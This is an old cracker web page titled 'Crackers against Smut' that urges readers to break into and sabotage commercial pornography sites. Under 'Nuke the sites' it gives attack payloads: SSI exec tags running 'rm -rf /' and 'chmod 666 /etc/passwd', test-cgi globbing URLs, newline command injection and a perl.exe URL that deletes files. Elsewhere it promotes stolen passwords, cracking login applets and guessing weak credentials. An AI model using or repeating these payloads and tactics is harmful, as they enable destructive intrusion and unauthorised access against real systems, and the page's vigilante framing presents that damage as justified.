Crackers against Smut

Why should we fight against Smut sites? Are we censors?



We are not censors, and we have nothing whatsoever against nude images (if 

given away for free), yet we have to wage battle against commercial smut sites 

for many pretty sound reasons. Here the main ones:



Because commercial smut sites are swamping the whole Web. They have swamped, for 

instance, the server where my main page was hosted to a point that made impossible 

for me to remain there. This swamping may seem strange, since there is NO REASON 

whatsoever to use or peruse such commercial smut sites. 

As anyone that visit these pages of mine knows, if you have learned how to search 

the web there is NOTHING... absolutely nothing that you will not find on the web. 

Any application you can think of, any image that has ever been taken or made, any 

BOOK that has been written dwells somewhere inside a server on our planet, ready 

to be downloaded by you for free. 

In such a situation selling "commercially" what is already free is only a 

fraud, where 'copyrights' laws are used as fig leaves to cover strong commercial 

interests, where all tricks are displayed to deny knowledge for the poors and 

the simple ones, all frills and 'push' activities are fostered heavily in order 

to keep under their consumistic chains and whips those still unaware of what's 

going on, gullible believers in a society where money -and not knowledge- means 

power (why?).



Yet this nether world of ours shows a NEW reality: inter alia you can get at, and 

download, all the knowledge (and horrors) of the human race. That is, you can, once 

you have found them.

The problem and the difficulty is to understand where exactly -and under which 

name that what you seek has been stored. 

This is fairly easy endeavour, though, (see my search engines and my 

how to search pages), yet many poor suckers 

and lusers simply don't know it, and have -for instance- to pay in order to 

get their daily smut ration... don't laugh at them! Imagine you are a frustrated 

young man, somewhere in Saudi Arabia, with a web access and enough money and yet 

no naked women images (nor many naked real women nor Wodka-Martinis for that matter :-) 

nowhere in a range of 1000 kilometers... you would probably fall for it as well...



Since, as you know, on the Web there is NO law, crackers are among the few that can 

try to put an end to any activity that they don't like. We decide alone what we allow

and what we forbid, since we HAVE (and spread) real knowledge... the only real "power" 

in our worlds of bytes and codes, where commercial minds stamp about blinded by 

money... and where we can destroy them, and stamp them out, as I will teach you. 



You'll begin to see here how we can attack, and you may decide to join and help (or 

even criticize and help... you are not compelled to agree with our course of action, 

of course).



The proliferation of these commercial sites is independent of their (mostly poor) 

contents, independent from the fact that they are offering images that you could 

have for free, since the people that fall for it DO NOT KNOW that, independent 

from all moralisation campaigns that, as usual in this awful society, always stop 

short of attacking the "holy" commercial activities... 

this swamping is simply a consequence of the inner working of these sites, 

which you must understand in order to defeat them, and that I will try to summarize 

here:



Let's see how a "classical" commercial smut works:



THE WORKING OF A CLASSICAL COMMERCIAL SMUT SITE

1) 	You steal a great number of bad scanned smut images from the newsgroups (where 

	anybody could get them for free, of course, but that's not the point for you).

2)	You get an Internic name like xxxsmuttfickxxx.com for 100 US dollars (you are

	already a server provider yourself, or you find one for next to nothing)

3)	You buy some bad-written cgi-scripts to get a paied access to your smut offerings.

4)	You realise that almost nobody comes

5)	You spam every usenet group you can get your hands on in order to get some 

	idiot to visit your site paying you some money

6)	You realise that almost nobody comes

7)	You prepare a real ugly smut image as "banner-ad" and exchange it with one 

	hundred other smut sites, hoping that the small park of frustrated rich idiots 

	that roam these sites (and pay for them) will give you some dollars too.

8)	You realise that almost nobody comes

9)	You specialise in nastier and nastier smut images ("lolitas swallowing horses" 

	"pregnant teenagers tortured by lorry drivers" or whatever)

10)	You swamp whole servers with the same poor images yet with twenty differently 

	named "entrances" to them.

11)	You spam and spam and spam and swamp and swamp and swamp

12)	You realise that most people that seek this kind of images still prefer to get

	them for free

13)	You write the word "free" everywhere in your commercial smut site hoping to 

	get somehow inside the search engines listings for free smut images.

14)	You eventually scrap your couple of bucks from your dirty floor and swallow them.





WHAT CAN WE DO AGAINST THEM?



Well, there are some possible line of actions (I hope you'll send me more 

ideas on this):



1)	Nuke the sites



	This is far from easy, and you need some particulat conditions to 

	be able to do it, yet it is great fun. You'll get some hints and 

	some simple tricks on my cgi reverse engineering pages one and two.



	Basically you just write something like

			#exec cmd="chmod 666 /etc/passwd"

	for SSI servers 

	or add something like the following to the http://www.yoursmuttarget.com

			com/cgi-bin/test-cgi?*

			com/cgi-bin/nph-test-cgi?/*

			com/cgi-bin/nph-test-cgi?etc/*

	or add to your target URL

			%0a/bin/ls%20-la%20/usr/src/include

	or submit a tag like the following one:	

			<!--#exec cmd="/bin/rm -rf /"-->

	or if the perl.executable is there run it with this URL:

			http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B

	and nuke the smut site for a while :-)

	And all this is just to SEE if you can play a little with them (a real 

	"complete" attack is of course a little more complicated).

VISIT MY cgi reverse engineering PAGE ONE

VISIT MY cgi reverse engineering PAGE TWO



2)	Find and explore the sites

	You can easily explore these sites 'jumping' over their password verification

	applets or scripts.

	1)	Download applets or scripts 

	2)	Crack them

	3)	Enter

	4)	Find a weak point

	5)	destroy

	These 'alien site exploring' techniques will be explained in december on this

	page. 

To find:

VISIT MY how to comb smut sites PAGE

VISIT MY combing and klebing techniques PAGE

To explore:

VISIT MY alien site exploring page (RESTRICTED ACCESS)

	

	Don't forget that you can enter through FALSE passwords. There are in the warez

	scene hundred of sites that offer 'capered' passwords for commercial smut sites.

	One of the rare case where I'm fully favourable to the warez kids. Million of

	frustrated smut-seekers use these free passwords in order to gain access to the 

	smut sites WITHOUT paying them. This is IMO very good because this does not only 

	damage the smut sites... in fact most of these simpletons realise in this way very 

	soon, how bogus all these commercial smut sites are and won't in their life never 

	come to the idea of paying for access again.



	The Commercial smut sites react against password capering with automated scripts that 

	deconnect all accounts used by two persons on the same time. Yet web server-user 

	notifications protocols are so unreliable that most of the time they just don't dare 

	doing it really, and simply use a completely useless warning, because there are 

	much too many dynamic IDs, and their real terror is to scare off one of the few 

	gullible correct users they have got. So if you get a scarecrow message visiting 

	with a capered password, just reload once more until it disappears.



	You can also of enter using gathered 'crumbs' that you'll find on the source

	html script of the page. Useful crumb gathering is also possible through right 

	clicking on any logo or image and carefully watching and registering the URL

	call sequence inside your "location" browser's window.

VISIT MY source checking PAGE



3)	Study the friends of your enemies

	Many commercial smut sites resort to 'commercial smut verificators', which pay them

	'per visit' and take care of the whole verification routines. While this offers a

	better security on one site (the cgi-scripts protections are tougher), this means 

	also that once you have cracked one of these schemes you have cracked all of them.

	My best attack (until now) could bust one of these verification schemes for two 

	complete days. The suckers that paid for it left it in droves and it never regained 

	its momentum. 

	I will teach you the weaknesses of these commercial verification schemes.

VISIT MY commercial smut verificators page (RESTRICTED ACCESS)



4)	Beat them at their own game: demonstrate that they are utterly useless

	There is practically not a single image on the commercial smut sides that 

	you could not have for free if you cared to. Yet, instead of leaving these 

	images where only determined people could find them (and why not, if they 

	want to see them, please go ahead), the commercial smut sites throw all

	these images everywhere on the web, making it dead easy, even for childrens, 

	to get at them even if they ARE NOT really seeking them (and since I have 

	three kids, I know what I am saying... if you want to have a look for yourself

	at what kind of smut you can get without any filter whatsoever, connect for 

	instance to http://www.bondage.com).



	This is a consequence of the awful society where we live, and where everything 

	is measured only through its 'commercial' value, even people and bodies, yet 

	there is no reason for us to accept this. Since nuking the commercial smut 

	sites is great fun but does not seem to bring us nowhere (there are simply 

	too many of them), I am considering writing simple robots that "dig out" for 

	free all smut images and publish (and update) these links automatically on 

	the usenet relevant groups where the suckers that PAY the commercial smut 

	sites roam. This should damage all commercial smut sites where it really 

	hurts: on their commercial site :-)



	So a good counter-offensive could be to publish on the relevant usenet

	groups (say once every week, automatically):

	1)	either a list of all password capering sites;

	2)	or a list of all the many really free smut sites (which exist but 

		are fairly difficult to find due to the fraudulent proliferation of 

		the adjective 'free' inside the commercial smut sites);

	3)	or a list of all the hidden links inside the main smut sites;

	4)	or some cracking tutorials for the PASSWORD ASKING AND CHECKING applets;

	5)	or some easy robots that would allow any luser to gather whatever 

		images he (thinks he) needs.

	I believe that sending all these info to every warez sites (which are all 

	concurring against another -for bucks- as well, and would tehrefore immediatly 

	publish everything you feed them, just in order to gain some more hits :-) would 

	inflict a more lasting damage to the whole commercial smut scene.

	

	Since the commercial smut sites cannot afford to change continuously the 

	whole subdirectory naming structure, the publishing of the hidden links and 

	subdirectories structure could be even more effective that the simple publishing 

	of the passwords or the occasional nuking of a couple of exposed site.



	We will examine (in december) how exactly a userid/password script works, and 

	how it 'decides' if the user should gain access to the site or not. There

	are now some new censorship applications that check THE (rosa) PIXELS of the 

	images in order to allow or forbid to 'corporate prisoners' to see them (see 

	my corporate survival page in order to defeat them).

	We will therefore reverse their algorithms in order to

	FIND where the images have been hidden inside any smut server. Such a little 

	robot application can then be given around for free... smut seekers will get 

	for free their smut-dope automagically brought home and commercial smut sites 

	will fail miserably as they deserve... hey! this can be very useful against 

	commercial advertisement sites as well, come to think of it :-)



	Another very interesting new sector is PASSWORD CAPERING. Let's have a closer 

	look at the passwords and userids used by the commercial sites (not only smut 

	sites btw). You'll soon realise that they are divided in TWO main categories:

	user-chosen and automatically generated.

	Both are very weak, as we know: 

user chosen passwords are repetitive:

	fred/fred 	(look at the letters "fred" on your keyboard)

	1111/1111

	1234/1234

	pamela/pamela	

	userid/password	(ofter that you would think)

That's the reason some commercial site 'assign' you a password:

	REDD12JH31/444JAH12@1

	99981-2312/RRAE112-43

And as all crackers know, there is nothing easier than crack the algorithms 

that assign valid passwords in this way once you download the applets or, even 

more simply, have just a (cracker :-) look at a dozen valid passwords taken from 

the many password warez sites.

VISIT MY password busting page (RESTRICTED ACCESS)

	

Please send me your hints and contributions for this section. 

MAny pages, as you have seen are 'restricted access' 

because I'm fed up with people just leeching and never contributing to my site. 

As you'll be able to see on my new bot wars page, I have 

decided to put part of the advanced knowledge in some restricted areas 

of my site, you'll be able to find quite a lot in the public part, but if 

you want more advanced stuff you'll have to contribute with your own 

knowledge.

 

It is clear that this project will only survive and thrive if there will be 

more and more essays from ALL OF YOU and if you will find and send me other 

-even better- tricks in order to commercial ruin (or at least to seriously annoy) 

all those bastards that run the commercial smut sites. 



We have done a lot already (see the October attack story), yet  we have 

a lot more to do in order to clean the web from commercial bastards... and not only 

regarding smut images...



Some lusers believe that money and sex are the two only things that count in life, and 

that 'combining' the two, they have found an easy way to scrap some easy bucks. Let's 

show them that in our world money does not mean anything at all and that even if sex 

would really have something to do with some poor quality smut photographical images, 

which I doubt, that too can be gathered on the web for free, like everything else. 

 

I hope you understand now WHY I want to bust commercial sites (apart from the 'intrinsecal' 

fun in busting web sites :-) and WHY this has nothing to do with any censorship attitude of 

mine: I am a cracker: I want a free web for all.

Crackers against Smut

Back to Fravia's main site
homepage +ORC anonimity counter measures tools stalking enslavement
students' essays bots' wars cocktails search_forms mail_fravia
Is reverse engineering legal?